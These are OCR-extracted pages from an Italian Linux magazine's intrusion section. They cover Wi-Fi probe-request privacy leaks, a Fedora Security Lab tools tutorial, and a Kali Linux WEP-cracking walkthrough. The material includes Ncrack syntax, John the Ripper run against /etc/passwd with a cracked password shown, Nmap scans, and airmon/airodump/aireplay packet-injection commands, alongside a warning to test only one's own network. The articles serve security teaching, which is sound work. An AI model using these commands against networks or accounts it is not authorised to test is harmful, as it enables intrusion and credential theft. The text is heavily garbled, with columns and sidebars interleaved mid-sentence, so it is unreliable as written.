sezione) è possibile dare un’occhiata più dettagliata dell’interfaccia Wi-Fi del dispositivo (si tratta di un
all’header del frame (Fig 12). Può essere significativo particolare tutt’altro che irrilevante, sul quale
soffermarsi, in particolare, sui campi: ritorneremo nei prossimi paragrafi).
Type/Subtype, che identifica il frame quale Probe Se passiamo alla successiva sezione IEEE 802.11
Request; wireless LAN management frame possiamo
Receiver Address e Destination Address, pari esaminare i contenuti veri e propri del frame di Probe

105
 Dispositivi Mobili
Fig 13: Il campo del frame di tipo Probe Request
Request. In particolare notiamo che, nel nostro caso,
il frame è costituito dai seguenti campi (Fig 13):
SSID, pari a 0 a testimoniare che il frame costituisce
(come visto in precedenza) una null probe request,
ovvero che il dispositivo mittente (il nostro
smartphone) sta effettuando una scansione di tutte
le reti disponibili in zona;
Supported Rates, completo di una lista di 8 valori
relativi alle capacità trasmissive supportate dal
telefono, comprese nell’intervallo tra 1 Mbit/s e 18
Mbit/s;
Extended Supported Rates, che aggiunge ulteriori
4 velocità di trasmissione supportate dallo smartphone
(nella fattispecie 24, 36, 48 e 54 Mbit/s);
oltre a due campi di tipo Vendor specific, tra i quali
risulta particolarmente interessante quello con
etichetta Microsof: WPS, pensato per ottenere una
connessione con access point in grado di supportare
il Wi-Fi Protected Setup (o WPS, vedi il box omonimo
in questa pagina). Osservandone con attenzione
i contenuti (Fig 14) possiamo rilevare numerose
informazioni in merito al nostro dispositivo:
il campo Primary Device Type ne descrive
WLAN: Wi-Fi Protected Setup (WPS)
Generalmente (e specie in ambiente domestico) la connessione dei
client all’access point avviene mediante la digitazione di una password,
grazie al ricorso al protocollo WPA2 con pre-shared key (WPA2-PSK).
Pur costituendo (allo stato) un buon compromesso per piccole reti,
questa procedura risente, per alcuni utenti, di un’eccessiva macchinosità,
specie al crescere dei dispositivi connessi alla rete. Per ciascuno di essi,
infatti, è necessario impostare la medesima password d’accesso (spesso
caratterizzata da una certa complessità, a causa dei vincoli restrittivi
imposti dai firmware degli access point per garantire un’adeguata
106
dettagliatamente la natura (un telefono, per l’appunto,
e in particolare uno smartphone operante in dual
mode);
il campo Association State segnala che l’apparato
non è, allo stato, associato ad alcun access point;
il campo Manufacturer ne rivela la marca (nella
fattispecie Archos);
il campo Model Name identifica il modello senza
possibilità di errore (Archos 50 Neon) fornendo, nel
caso specifico, la medesima informazione del campo
Model Number, teoricamente riservato alla stringa
numerica identificativa del modello stesso;
il campo Device name comunica il nome mnemonico
associato al dispositivo (mtka50ne).
Possibili ricadute sulla privacy
Ricapitolando, l’analisi di un singolo, innocente frame
di tipo Probe Request inviato dal nostro smartphone
ci ha consentito di entrare a conoscenza delle seguenti
informazioni relative al dispositivo stesso:
il MAC address;
la natura dell’apparato;
la marca e il modello;
ovvero di tutte le informazioni necessarie per
identificare il telefono sia a un esame visivo sia nel
corso delle sue attività di rete. Queste informazioni
sono state propagate in tutta l’area ove si trova lo
smartphone, divenendo di conseguenza di pubblico
dominio. Se questa considerazione non vi infastidisce,
potrebbe invece interessarvi sapere che,
potenzialmente, quanto trasmesso può essere stato
registrato da un qualunque apparato posto nella
suddetta area (sia esso un access point o un’altra
stazione mobile), il quale risulterebbe in possesso,
per un tempo indefinito, di informazioni dettagliate sul
vostro dispositivo. Come visto nel corso della nostra
dimostrazione dal vivo, infatti, lo sniffing di una
trasmissione Wi-Fi non protetta (quale, per l’appunto,
quella relativa allo scambio di pacchetti di tipo Probe
Request e Probe Response tra la stazione mobile
e l’access point) è un’operazione passiva che può,
pertanto, essere eseguita in maniera del tutto
trasparente agli interlocutori della conversazione.
A questo punto, tuttavia, qualcuno potrebbe obiettare
che l’eventuale registrazione delle informazioni
trasmesse, per quanto discutibile sotto il profilo etico
e legale, non costituisce un pericolo data la natura
pubblica di quanto trasmesso: d’altro canto, non
protezione), e la stessa va quindi aggiornata a ogni successiva modifica
operata sull’access point. Per semplificare questo procedimento, è stato
realizzato il protocollo WPS (Wi-Fi Protected Setup), che offre la
possibilità di utilizzare strumenti alternativi per l’autenticazione alla
WLAN, come un PIN numerico di 8 cifre o la pressione di un apposito
pulsante sull’access point per garantire la connessione del dispositivo
d’interesse senza richiedere alcuna credenziale d’accesso. Nonostante
l’indubbia comodità, tuttavia, il WPS risente di alcune vulnerabilità
progettuali, e andrebbe pertanto disabilitato in ogni access point.
 Il nemico arriva dal Wi Fi
è forse vero che marca e modello del nostro
smartphone possono essere dedotti da un semplice
esame visivo? In realtà un’analisi del genere sarebbe
alquanto semplicistica: marca e modello del nostro
telefono sono correlate, nel frame di tipo Probe
Request, al MAC del dispositivo. Ciò significa che
un dispositivo in grado di ascoltare anche il traffico
prodotto a seguito del frame di Probe Request (e della
successiva, positiva risposta dell’access point con
un frame di Probe Response), come per esempio
un apparato posto nella medesima WLAN del nostro
smartphone (vedi il box WLAN: confidenzialità del
traffico), potrebbe ragionevolmente associare alla
singola persona i dati trasmessi e ricevuti dal telefono
(per esempio, una sessione di navigazione Web),
semplicemente correlando le informazioni estratte
dal frame con un esame visivo degli individui presenti
nell’area coperta dal segnale. Uno smartphone
impegnato in una sessione di navigazione Web, infatti,
è in genere tenuto bene in vista dal proprietario,
intento alla consultazione dei siti oggetto della
navigazione: i modelli più in voga, inoltre, hanno forme Fig 14: Il campo
ed elementi di design facilmente riconoscibili anche Vendor Specific
osservandoli dalla distanza. l’interfaccia Wi-Fi solo al bisogno, avendo cura relativo al WPS
di disattivarla una volta cessata l’esigenza: questo ci consente di
Contromisure stratagemma, peraltro, ha un impatto positivo sulla scoprire molte
Se gli scenari delineati vi hanno indotto a riflettere, durata della batteria, in quanto riduce il consumo informazioni
senz’altro vi sarete posti una domanda: come complessivo di energia dell’apparato (trasmettere di dettaglio
sul nostro
possiamo minimizzare gli impatti sulla privacy “costa” in termini di energia elettrica!).
smartphone...
dell’utilizzo del Wi-Fi nei terminali mobili? La risposta,
a fronte delle dettagliate spiegazioni sin qui fornite, In conclusione
è di una semplicità disarmante: per limitare i possibili Per completezza, occorre osservare come non tutti
pericoli per la nostra privacy, il primo passo da i dispositivi mobili siano “chiacchieroni” quanto quello
compiere è quello di disabilitare l’interfaccia Wi-Fi utilizzato nei nostri esempi: alcuni apparati,
del nostro smartphone/tablet, quando questa non effettivamente, sono più parchi di informazioni
è strettamente necessaria. Per quanto visto in identificative. Allo stesso modo, tuttavia, esistono
precedenza, infatti, un’interfaccia non disabilitata dispositivi più “generosi” del nostro: in prove aggiuntive
comporta l’esecuzione, da parte del nostro dispositivo effettuate nel corso della redazione di questo articolo,
mobile, del processo di scansione attiva delle reti è stato possibile identificare, all’interno di frame di tipo
disponibili in loco. Ciò si traduce nell’invio periodico Probe Request, persino il seriale di un dispositivo
di frame di tipo Probe Request, e quindi nella mobile! Nell’era della tutela dei dati personali e della
potenziale trasmissione di informazioni identificative privacy, vale la pena di correre il rischio di offrire
del dispositivo nell’area di copertura del segnale. a chiunque informazioni direttamente riconducibili
Se dunque non si ha la necessità di connettersi a noi senza che ce ne sia l’effettivo bisogno? Se per voi
ad alcuna WLAN, e al contempo si pone una certa la risposta è no, spegnete immediatamente l’interfaccia
attenzione alla tutela della propria privacy, la soluzione Wi-Fi del vostro smartphone... a meno che non la stiate
migliore non può che essere quella di abilitare utilizzando proprio in questo momento!

WLAN: confidenzialità del traffico

Il traffico di una WLAN è, generalmente, protetto da cifratura: un utente
esterno alla rete, che quindi non sia a conoscenza della password
di accesso alla stessa, non può ascoltare (a meno di vulnerabilità nel
protocollo crittografico utilizzato) le informazioni scambiate dagli utenti.
Ma cosa accade se ad ascoltare è un legittimo utente della rete? Al pari
di quanto avveniva nelle reti Ethernet ai tempi degli hub, in una WLAN
il traffico non viene ricevuto esclusivamente dall’utente destinatario,
e pertanto può essere ascoltato (e letto) da qualunque altro utente della
rete. In condizioni normali, ciò non avviene: il firmware incluso nella
scheda wireless di ciascuna stazione, infatti, passa al livello superiore
i soli pacchetti di competenza della stazione, scartando i restanti.
Ciò non toglie, tuttavia, che qualche utente possa porre in modalità
promiscua la propria scheda di rete, con il risultato di leggere tutto
il traffico trasmesso dagli altri. Per quanto questa pratica sia discutibile
sotto i profili etico e legale, non ci resta che un’unica soluzione
se teniamo alla nostra privacy: evitare di inviare in rete informazioni
personali quando si è connessi a una WLAN (a meno che non sia quella
domestica), oppure premurarsi di farlo esclusivamente utilizzando
protocolli che tutelino la riservatezza delle informazioni (come,
per esempio, l’HTTPS, da prediligere a scapito del protocollo HTTP).

107
 Intrusioni
Desktop a prova
di hacker
Siete sicuri che la rete locale sia a prova di intruso? Scoprite come
gli strumenti di Fedora permettano di dormire sonni tranquilli
S
e siete tra coloro che si preoccupano della
propria sicurezza, potreste non sapere
da dove cominciare. Ci sono decine di opzioni
da gestire e configurare, senza considerare quelle
più complesse che richiedono un attento
approfondimento. Il rischio, altrimenti, è di fare danni,
Tip impedendo alla rete locale di funzionare a dovere.
Per fortuna esiste un pacchetto pensato per rendervi
la vita semplice. Si chiama Fedora Security Lab
Scaricate Security
Lab da https://
ed è la soluzione all-in-one per i vostri problemi.
labs.fedoraproject. Prima di proseguire, prendiamoci qualche minuto
org usando il per fare la conoscenza di questa suite. Fedora, come
download diretto. tutti sappiamo, è una meravigliosa distro Linux,
Se preferite, potete
inizialmente sviluppata dalla comunità Fedora Project
sfruttare anche
il P2P tramite e sponsorizzata da Red Hat. In modo simile a quanto
Torrent. Sono accade per Debian, Fedora può contare su diverse
disponibili diversi varianti che vengono comunemente chiamate “labs”
mirror per garantire (ci sono anche diverse “spin” che sfruttano ambienti
la massima velocità.
desktop preconfigurati come Gnome). Queste versioni
108
parallele sono pensate per soddisfare esigenze
specifiche: design, istruzione, giochi e protezione.
Fedora Security Lab, com’è facile intuire dal nome, si
rivolge ai professionisti della sicurezza e a tutti coloro
che vogliono gestire al meglio questo importante
comparto informatico. Per esempio, può servire
per verificare la resistenza della propria infrastruttura
di rete, oppure per approfondire gli argomenti
strettamente legati alla protezione dei dati. Infatti,
offre numerosi strumenti che consentono di eseguire
controlli completi, recuperare le password,
diagnosticare problemi in un ambiente isolato e molto
altro ancora. Fedora Security Lab può essere
scaricata come file ISO (la trovate nel DVD allegato
alla rivista) da masterizzare in un DVD, oppure da
installare in una pendrive USB (usate Unetbootin)
e funziona in modalità Live (non richiede
installazione). Questa soluzione offre quindi
un’elevata portabilità che facilita chi vuole sfruttare
la distro su server, workstation da ufficio o computer
domestici. Una volta avviata la piattaforma dal CD
Live, potete procedere con un’installazione su disco
fisso. In questo tutorial illustreremo le basi per usare
gli strumenti più importanti messi a disposizione
da Fedora Security Lab. Vi invitiamo però ad andare
oltre, approfondendo le tante altre funzioni che
non riusciremo a toccare per i limiti imposti dallo
spazio editoriale.
Prova su strada
Una volta avviato il CD Live, avrete accesso al sistema
operativo Fedora. La prima cosa che si nota
è il desktop piuttosto scarno. Le animazioni delle
finestre sono ridotte al minimo e l’ambiente Xfce
mantiene solo le caratteristiche di base. Sullo sfondo
ci sono alcune icone che rimandano al terminale,
al gestore file e al browser Web. In alto a sinistra
trovate la scheda Applicazioni che rivela l’intera
dotazione di strumenti. I software sono divisi
per categoria: Accessori, Documentazione, Grafica,
Internet, Security Lab, Sistema, Sviluppo e Ufficio.
Ci sono perfino nomi piuttosto famosi come
Ettercap, Nmap e Medusa. La maggior parte dei
programmi sono stati progettati per eseguire prove
 Fedora Security Lab

Il desktop di Fedora Security Suite è minimale. Il menu Il generatore di password incluso in FDS è in grado di processare 100 chiavi
Applicazioni consente di accedere a tutti gli strumenti di accesso in modo casuale per ogni query

di sicurezza. Sono comunque presenti alcune
applicazioni per la produttività e la navigazione Web,
ma in numero non sufficiente per rendere la distro
adatta all’uso quotidiano. Come potrete vedere,
il sistema è progettato per la massima velocità
e leggerezza. I rootfs di lettura e scrittura alla base
del CD Live consentono di installare al volo qualsiasi
software sul disco. Potrete personalizzare la distro
in poche e semplici mosse. Iniziate dando un’occhiata
alla scheda Applicazioni. Nel menu a discesa che
si apre, troverete tutto quello di cui avete bisogno.
Nella scheda Sistema ci sono una serie di programmi
per l’utilizzo del terminale. Quasi tutti richiedono
l’uso della pass di root. Le applicazioni vanno
dal chrootkit per il rilevamento delle intrusioni, fino
a strumenti di debug, passando poi per i password
cracker. La funzione Security Lab contiene più
o meno gli stessi software, restringendo però la scelta
a quelli esclusivamente dedicati alla sicurezza.
Tanti strumenti
Adesso che abbiamo dato una descrizione generale
della distro, passiamo ad approfondirne alcuni
aspetti. Il primo programma di cui ci occuperemo
è pwgen, un generatore di password. Per lanciarlo,
viene chiesta la pass di root. Una volta ricevuta
l’autorizzazione, trovate una serie di opzioni. Queste
includono la configurazione di una password generata
per rispondere a determinati criteri: avere almeno
una lettera maiuscola, un numero, un carattere
speciale e via dicendo. Per generare una chiave di 14
caratteri con almeno una lettera maiuscola, basta
usare il comando # pwgen –c 14 all’interno del
Tip
prompt. Com’è facile capire, lo strumento si rivela Per utilizzare
molto utile per creare password casuali e difficili Fedora Security
da scovare. Un altro programma utile è Disk scruber Lab da una
(scritto con una sola “b”). Si tratta di un’applicazione chiave USB, usate
UNetbootin
a riga di comando che cancella in modo sicuro
(http://unetboot
qualsiasi file archiviato nel disco fisso. Ci sono in.github.io).
svariate opzioni da utilizzare, tra cui i popolari sistemi Permette di creare
DoD e Gutman n. Per impostazione predefinita viene una pendrive
avviabile da
comunque usato NNSA 3-pass wipe . C’è però
un’immagine ISO.
un aspetto molto importante da tenere in
considerazione. Disk scruber non rimuoverà i file
dal disco se non si specifica il comando tramite
l’opzione -r. Senza quest’ultimo, l’unica cosa a essere
cancellata è il contenuto del documento. Certo,
d’ora in poi il file sarà inutilizzabile, ma comunque
ancora presente nell’hard disk. Un altro programma
simile a Disk scruber è Nwipe che viene utilizzato
per fare tabula rasa di dischi o partizioni. Si può usare
con tre opzioni diverse che permettono di agire con
sovrascritture da uno a otto passaggi. Anche se meno
preciso rispetto a scruber, è comunque un buon
alleato per chi vuole cancellare qualsiasi traccia
dal proprio hard disk. Se amministrate una rete
aziendale con centinaia di utenti, probabilmente
non avrete il tempo per verificare la solidità di tutte
le password utilizzate. In Fedora Security Lab trovate
un programma che fa al caso vostro. Si chiama

Risorse
In Security Lab ci sono parecchi
programmi. In questo articolo ne abbiamo
analizzati solo alcuni. Se volete
approfondire l’uso di ciascuna applicazione,
potete consultare le singole risorse
rilasciate dagli sviluppatori. La maggior
parte dei software citati in queste pagine,
come Wireshark, Nmap, Ncrack, John
e Nwipe, ha i propri siti ufficiali.
Per Wireshark, per esempio, basta
collegarsi a www.wireshark.org. Per Nmap,
Ncrack e Nwipe c’è https://nmap.org.
Su John, invece, trovate tutto a www.
openwall.com/john. Se volete una breve
panoramica sui programmi installati nella
distro, date un’occhiata a https://labs.
fedoraproject.org/en/security. Ci sono
anche diversi tutorial non ufficiali creati
dagli appassionati di ciascun software.
Per Wireshark consigliamo di consultare
http://bit.ly/WireSharkTut. Se però
avete bisogno di informazioni più
dettagliate per l’uso professionale,
rimandiamo al manuale ufficiale su http://
bit.ly/WireSharkGuide. Non troverete
una fonte di informazioni migliore di questa.
Consigliamo comunque di procedere
con pazienza e attenzione. Lo studio non
è semplice e richiede tempo. Infine
segnaliamo una buona guida base per
Nmap su http://bit.ly/Nmap4Beginners.
Le risorse disponibili in Rete non si fermano
qui, basta cercare e verrete accontentati.

109
 Intrusioni
Ncrack ed è un cracker per l’autenticazione di rete

Tip ad alta velocità. È progettato per verificare tutti

gli host e i dispositivi connessi, puntando l’attenzione
su quelli che utilizzano password deboli. Funziona
Se non trovate
alcune funzioni da riga di comando e fornisce fin da subito un ricco
di cui parliamo menu di opzioni. Basta utilizzare l’istruzione:
in questo articolo, # ncrack [OPTIONS] [TARGET]
lanciate il comando Ncrack supporta una buona quantità di protocolli,
yum update.
tra cui FTP, SSH, HTTP, POP3, SMB, RDP e VNC.
In questo modo
verranno aggiunti Un altro strumento simile è John (noto più
molti strumenti comunemente come John the Ripper). Molti di voi
extra. Quelli lo conosceranno per le proprie funzioni di cracker
presenti saranno
brute force. L’applicazione frutta principalmente
poi aggiornati.
due modalità di attacco. La prima viene definita Nwipe fa pulizia di tutti i dati contenuti in un disco fisso
“dizionario”. Compara una serie di chiavi criptate/ tramite sistemi di rimozione sicura. L’interfaccia blu
hash con una lista predefinita. Il secondo sistema è molto simile a quella di DBNA
richiede invece più tempo, ma è adatto quando
si ha a che fare con password estremamente robuste, Warning: MaxLen = 13 is too large for the current hash type,
non contenenti parole dal senso compiuto. Rispetto reduced to 8
a Ncrack, John è da preferirsi se volete eseguire koe (Test)
un crack di una password locale. Infatti, usando 1g 0:00:00:01 3/3 0.7246g/s 769588p/s 769588c/s 769588C/s
questo software, è piuttosto semplice decifrare bia1388..sunshesa
le chiavi presenti in /etc/password. Basta lanciare Use the “--show” option to display all of the cracked
l’istruzione #john /etc/passwd nel prompt. L’output passwords reliably
sarà poi simile a questo: Session completed
Loaded 1 password hash (descrypt, traditional crypt(3) [DES Come potete vedere, la password per l’utente “Test”
128/128 SSE2-16]) è “koe”. Nel caso in cui non sia presente alcuna chiave
Press ‘q’ or Ctrl-C to abort, almost any other key for status memorizzata, comparirà questo messaggio: No
password hashes loaded.

Sicurezza prima di tutto

Disk scruber fornisce aggiornamenti in tempo reale sul processo di wiping.
La velocità dipende dalla dimensione dei file da eliminare
Una delle migliori applicazioni di Fedora Security Lab
è Nmap. Si tratta di un programma gratuito e Open
Source che punta l’attenzione sulla sicurezza di una
rete. La sua funzione primaria è scoprire gli host
e i servizi presenti nell’infrastruttura, così da creare
una mappa precisa. Per eseguire questa operazione,
Nmap crea e invia pacchetti a un host di destinazione,
analizzandone poi le risposte. Ci sono molte opzioni
particolarmente utili, come il rilevamento del sistema
operativo e dell’hardware, la scansione delle porte
e altro ancora. Nmap funziona tramite prompt
dei comandi e GUI. In quest’ultimo caso, lo troviamo
con il nome di Zenmap. L’interfaccia è molto chiara,
ordinata e capace di rendere il programma ancora
più intuitivo. Ci sono altri ambienti grafici disponibili,
ma noi prenderemo in considerazione solo quello
incluso in Fedora Security Lab. Al primo avvio
noterete la possibilità di scegliere l’obiettivo della

Altri progetti
Come abbiamo accennato all’inizio
di questo articolo, esistono molti altri
progetti (lab) che fanno capo a Fedora.
Si differenziano in base all’ambito
di utilizzo che consente di avere una
distro pensata esclusivamente per un
determinato scopo. Tra i lab più in voga
ce ne sono molti dedicati a educazione,
giochi, design grafico e comparto
scientifico.Troviamo quelli rivolti
all’educazione come Sugar on a Stick
(SOAS) che fornisce un ambiente a misura
di bambino. Da non dimenticare le spin
rivolte ai videogame come Fedora Games
Lab che viene fornito con una vasta serie
di giochi gratuiti. C’è poi Fedora Design
Suite destinato agli artisti digitali. Fedora
Scientific Lab è invece indirizzato
all’analisi dei dati e alle operazioni di
calcolo. Per approfondire le informazioni
su queste varianti di Fedora, consultate
la pagina https://labs.fedoraproject.org.
Tra le tante spin, ci sono quelle che
utilizzano ambienti desktop alternativi
come KDE Plasma, Cinnamon e altri
ancora. La lista completa è consultabile
su https://spins.fedoraproject.org.

110

Zenmap è uno degli scanner più potenti e affidabili
che ci siano in circolazione. La versione senza interfaccia
grafica è conosciuta come Nmap
scansione, il tipo di profilo e inserire comandi
personalizzati. La scheda Nmap output posta
al centro dell’ambiente riporta tutto ciò che viene
rilevato dal software. Nella sezioni Port/Hosts,
Topologia, Dettagli host e Scansioni ci sono
ulteriori informazioni su quanto riscontrato durante
le operazioni. Se invece preferite utilizzare
l’interfaccia a riga di comando, una volta aperta,
verrete accolti da una lunga lista di opzioni.
Queste possono essere aggiunte alle istruzioni
per compiere determinate attività. La sintassi tipica
di Nmap è # nmap [OPTIONS] [TARGET], dove
[OPTIONS] si riferisce ai diversi parametri utili
a personalizzare la scansione, mentre [TARGET]
è l’indirizzo IP del bersaglio. Provate a utilizzare
Nmap sul vostro router con #nmap 192.168.0.1.
In alternativa, niente vieta di usare il nome host
anziché l’IP. Avvierete una scansione intensiva
sull’indirizzo 192.168.0.1 che rileverà le porte
e i servizi aperti del router. Potete eseguire una
valutazione su più indirizzi o subnet, elencando ogni
IP dopo il primo con uno spazio che li separa. Infine,
siete in grado di determinare un intervallo di IP
o sfruttare i caratteri jolly tipo:
# nmap 192.168.1.1-20
# nmap 192.168.1.*
# nmap 192.168.1.0/24
Se eseguite una scansione con intervallo tra gli
indirizzi e volete escludere uno specifico host, usate
la funzione exclude. Basta far seguire una virgola (,)
per ogni IP da omettere. Per esempio:
# nmap 192.168.1.0/24 –exclude
192.168.1.4,192.168.1.35.
Rilevare i pacchetti
L’ultimo software che andremo ad analizzare
è il famoso Wireshark. Si tratta di uno dei migliori
scanner per l’analisi dei protocolli di rete
in circolazione. Questo programma, infatti, consente
di vedere nel dettaglio tutto quello che succede
all’interno dell’infrastruttura, con tanto di pacchetti
inviati e ricevuti. Wireshark supporta un’enorme
quantità di protocolli capaci di rendere l’applicazione
estremamente versatile e completa. Al primo avvio,
Fedora Security Lab
verrete accolti da una schermata di benvenuto che
vi chiede quale interfaccia di rete analizzare.
Una volta scelto, l’ambiente si divide in tre pannelli.
Nella parte superiore viene mostrato un colore
diverso per ogni pacchetto rilevato. Le altre due
sezioni indicano una serie di informazioni dettagliate
sui dati passanti, tra cui la dimensione del pacchetto,
l’orario di arrivo, il tipo di protocollo utilizzato
e molto altro ancora. Per interrompere l’analisi, basta
premere il pulsante Stop posto in alto a sinistra.
Una volta avviata la scansione, i principali colori che
vedrete comparire nella finestra dedicata sono verde,
rosso, blu o nero. Per impostazione predefinita,
il verde corrisponde all’uso del protocollo TCP
( Transmission Control Protocol ), il blu si riferisce
al traffico DNS, azzurro è assimilabile a UDP ( User
Datagram Protocol ), mentre nero e rosso identificano
i pacchetti problematici come quelli che vengono
consegnati fuori ordine. Potrete restringere la ricerca
utilizzando i filtri disponibili nel menu presente nella
barra di stato. Da qui siete in grado di focalizzare
l’attenzione su un determinato passaggio di dati,
come quello riferito ai DNS o a UDP. Niente poi vieta
di creare le proprie regole per gestire ancora meglio
l’analisi dei risultati. Infine, avrete la possibilità
di seguire il percorso fatto da un singolo pacchetto,
valutando così il flusso dati tra client e server.
I programmi che abbiamo citato sono solo una
piccola goccia nel mare di Fedora Security Lab.
Uno degli aspetti più interessanti di questa distro
è la personalizzazione. Come qualsiasi altra
piattaforma, potete aggiungere o rimuovere
applicazioni secondo le vostre necessità.
Data la natura molto tecnica di alcuni strumenti, così
come l’assenza di molte GUI, l’uso di questo ambiente
non è adatto a tutti. Se l’assaggio vi è piaciuto, potete
approfondire l’argomento sulla wiki dedicata
al progetto, disponibile alla pagina https://
fedoraproject.org/wiki/Security_Lab.
John (The Ripper) permette di verificare se gli utenti collegati alla rete
locale utilizzano password fragili
111
 Intrusioni

Kali Linux
Scoprite con noi le potenzialità della famosa distro
pensata per i test di penetrazione professionali

K
ali Linux è una splendida distro Kali può essere utilizzato sia in modalità Live, la scheda wireless affinché capti
da usare per i test sia installandolo su disco fisso. Il nostro primo silenziosamente tutti i pacchetti che circolano
di penetrazione. Mette tutorial mostra come eseguire un hack di una nell’etere, è molto meno probabile incappare
a disposizione tutti gli strumenti rete Wi-Fi con protezione WEP. Gli attacchi in qualche blocco preventivo. Questa modalità
più utili per eseguire hack di qualsiasi di base con aircrack-ng, lo stesso strumento d’azione viene definita “Monitor”. Nelle pagine
genere. Prima di proseguire, è però che utilizzeremo, hanno cominciato a fare che seguono, non tratteremo la creazione
importante fare un precisazione: la loro comparsa circa 15 anni fa. Alla fine di una rete WEP. Potete farlo in modo semplice
non utilizzate le tecniche e veloce con qualsiasi vecchio
che illustriamo su nessuna
macchina di proprietà altrui, “Non usate nessuna delle router. La nostra soluzione
preferita consiste invece
a meno di non avere
il permesso del proprietario.
tecniche che vi illustriamo nel generare un hostapd
in esecuzione su Raspberry
Questa guida potrebbe essere
utilizzata per accedere a sistemi
su macchine di altre persone” Pi. Identificate il file
di configurazione hostpd.
a cui non dovreste mettere mano. Se venite di questa guida, se non avete ancora config e trovate le righe che seguono:
beccati (se l’unica base che avete è questo commutato la vostra wireless in WPA2, interface=wlan0
articolo, allora state certi che verrete presi), ci sarà un motivo ancora più valido per farlo. driver=nl80211
potreste trovarvi in guai seri. Anche nell’ipotesi Il cracking delle reti Wi-Fi non si limita a provare bridge=br0
in cui non finiate in un’aula di Tribunale, più password fino a trovare quella giusta. ssid=WEPnet
la Polizia Postale potrebbe comunque bussare I moderni router, infatti, metterebbero in black- hw_mode=g
alla vostra porta. In definitiva, utilizzate list il vostro dispositivo dopo un paio di tentativi channel=6
gli spunti che forniamo solo per esercitarvi andati a vuoto. Al contrario, è fondamentale auth_algs=3
in una rete di vostra esclusiva proprietà. avere un approccio più passivo. Configurando wep_default_key=0

112

wep_key0="short"
La nostra chiave a cinque caratteri corrisponde a 40 bit,
un valore più che adatto per iniziare. Il cracking di password
più lunghe è comunque possibile, ma richiede una maggior
quantità di pacchetti e tempo. Per rompere una credenziale
da 40 bit serve circa un minuto, vale a dire il periodo
necessario ad acquisire un numero sufficiente di dati.
Una volta inquadrato l’ hotspot WEB da attaccare, passate
all’uso di Kali Linux.
Preparatevi all’attacco
Di solito, far lavorare un dispositivo wireless in Linux non
è un’operazione semplice. Alcune schede richiedono
un firmware supplementare, mentre altre danno grattacapi
di vario genere. In base al vostro equipaggiamento hardware,
dovrete cavarvela da soli. Se comunque la periferica Wi-Fi
funziona con altre distro, non dovrebbe avere alcun problema
a farlo in Kali Linux. A tal proposito, c’è però una precisazione
da fare. Molti driver wireless non supportano la modalità
Monitor. Alcuni, come il wl di Broadcom per il chipset
BCM2235-2238 comunemente usato nei portatili, riescono
nell’intento pur dovendo abilitare la funzione manualmente.
Altri, invece, sono proprio sprovvisti di questa opzione.
In definitiva si tratta di un campo minato. Per aiutarvi, date
un’occhiata al sito di aircrack-ng, in cui è presente la lista
aggiornata che mostra i chipset supportati:
www.aircrack-ng.org/doku.php?id=compatibility_drivers.
Prima di attivare la modalità Monitor, è una buona idea
disabilitare il Network Manager o qualsiasi altro processo
che dialoga con la scheda di rete (wpa_supplicant, avashi,
ecc). Questi, infatti, potrebbero interferire con le operazioni.
Una volta che il dispositivo è operativo con funzioni Monitor,
dovrete scollegarvi da qualsiasi rete Wi-Fi. Per verificare
se tale modalità viene supportata, in Kali Linux lanciate
il Terminale ed eseguite l’istruzione: # airmon-ng start wlan0 6.
Sostituite wlan0 con il nome dell’interfaccia wireless (potete
scoprirla da iwconfig) e il valore 6 con il canale della rete
di destinazione. A questo punto compare un avviso, in cui
vengono indicati i processi di sistema che interagiscono con
la scheda di rete. Prima di proseguire, dovrete terminarli. Alla
fine dell’output, potreste leggere un messaggio di questo tipo:
(mac80211 monitor mode vif enabled for [phy0]wlan0 on
[phy0]wlan0mon)
L’istruzione wlan0mon indica la nuova interfaccia creata
ad hoc. Molti driver verranno ridefiniti con svariati nomi,
tra cui mon0. Per verificare che la modalità Monitor sia
effettivamente attiva anche su questo collegamento, eseguite
# iwconfig wlan0mon. È importante ricordare che Kali Linux
non è una distro per l’uso generale. L’utente predefinito è root,
poiché la maggior parte dei comandi che lancerete richiede
Mettere alla prova il sistema
permessi amministrativi. Infatti, le solite preoccupazioni
sul distinguo tra i vari account non sono importanti. Adesso
potrete iniziare a divertirvi con #airodump-ng wlan0mon.
Airodump gestirà il vostro adattatore hop e fornirà una serie
di informazioni: nomi degli access point (SSID), MAC address
(BSSID) e il numero dei client collegati. Da notare che BSSID
e il canale della rete sono gli obiettivi dell’attacco. Nel nostro
caso, ci riferiamo a una serie di dati fasulli, tra cui un MAC
00:de:ad:be:ef:00 su canale 6. Conoscere l’indirizzo
MAC di un client connesso alla rete può essere molto utile,
soprattutto quando si arriva a iniettare i pacchetti. Generando
un po’ di traffico, dovreste vedere il flusso che aumenta
nella colonna #data. Quando siete soddisfatti, premete
Ctrl+C per interrompere il rilevamento. Se siete stati attenti,
avreste dovuto cogliere un particolare. In questa fase, infatti,
non siete ancora in possesso della chiave WEP e quindi
non potete generare alcun traffico sulla rete da colpire.
La soluzione è però a portata di mano (hardware permettendo).
Verificate che la vostra scheda possa iniettare dei pacchetti.
Di solito, questo approccio funziona meglio se la macchina
attaccante è vicino al router (un evento piuttosto raro
se il MAC non è un portatile):
# aireplay-ng -9 -e WEPnet -a 00:de:ad:be:ef:00 wlan0mon
Se vedete comparire un output simile a quello che riportiamo
di seguito, allora siete a cavallo. In caso contrario, l’attacco
potrebbe non funzionare a meno che i dati non vengano
inoculati in modo affidabile.
02:23:13 00:13:EF:C7:00:16 - channel: 6 - ‘WEPnet’
02:23:14 Ping (min/avg/max): 1.384ms/7.336ms/21.115ms
DVWA è davvero piena di vulnerabilità! Basta una query per seminare il panico

Parliamo un po’ di WEP...

Lo standard WEP è sempre stato famoso
per le sue tante vulnerabilità. Uno dei
principali punti deboli è caratterizzato
dall’attacco statistico. Oltre alla chiave
a 40 bit, per la crittografia viene usato un
vettore di inizializzazione (Initialisation Vector
IV). L’offensiva più diffusa contro WEP
prevede la raccolta di molti IV e dei pacchetti
associati. Sfruttando alcuni calcoli statistici,
si ottiene la chiave di decriptazione. Per una
password a 40 bit, sono sufficienti circa
5.000 pacchetti. Il fatto che la rete possa
essere occupata, non è assolutamente
un problema. Basta usare un piccolo trucco
per far genere un flusso dati al router, quindi
mettersi in ascolto sulle richieste ARP
utilizzate per collegare MAC e IP. Questi
pacchetti vengono catturati e iniettati
di nuovo al router che risponderà con gli ARP
corrispondenti. Potete riconoscerli per le loro
dimensioni e non avrete alcun bisogno
di decifrarne contenuto. Ogni risposta ARP
fornisce un nuovo IV che sarà l’ultimo colpo
secco alla porta in rovina della rete WEP.

113
 Intrusioni
Power: -39.73
02:23:14 30/30: 100%
